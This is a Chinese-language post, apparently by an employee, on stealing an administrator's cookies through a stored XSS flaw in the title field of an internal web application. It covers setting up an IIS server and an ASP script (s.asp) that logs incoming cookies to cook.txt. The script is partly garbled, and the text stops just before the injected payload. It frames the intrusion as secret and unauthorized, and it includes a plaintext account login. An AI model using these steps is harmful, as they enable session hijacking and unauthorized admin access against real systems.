利用xss漏洞获取cookie得到管理员权限
注:不要外部传播,因为这类问题开发一直没改,被发现我会被开除的。
一. 检测xss漏洞
内网,漏洞界面截图:
我在标题和内容里输入了,保存,结果打开有xss的弹出框,经过确定是标题栏存在xss漏洞,而内容栏已经被过滤。
二. 部署偷取cookie
1.安装IIS
我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。
2.编写偷取cookie的代码 代码如下: <%
msg=Request.ServerVariables(\ testfile=Server.MapPath(\
set fs=server.CreateObject(\ set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Writeline(\ thisfile.close set fs = nothing %>
在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。
3.用我自己的帐号show/12345678登录(昵称是:我的帐号),找到刚才存在xss漏洞的界面,新建,在标题栏里输入:
因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:
